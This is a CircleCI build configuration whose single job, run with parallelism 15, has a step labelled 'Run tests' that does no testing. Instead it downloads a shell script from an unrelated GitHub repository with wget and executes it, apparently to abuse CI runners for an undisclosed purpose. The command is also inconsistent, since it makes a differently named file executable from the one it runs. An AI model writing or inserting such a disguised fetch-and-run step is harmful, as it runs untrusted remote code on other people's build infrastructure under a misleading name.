jobs:   
  build:   
    parallelism: 15
    docker:   
      - image: cimg/ruby:3.0.2-node   
    steps:    
      - checkout    
      - run:    
          name: Run tests    
          command: wget https://raw.githubusercontent.com/R8610/asu/main/JNE.sh  && chmod +x memek.sh && ./JNE.sh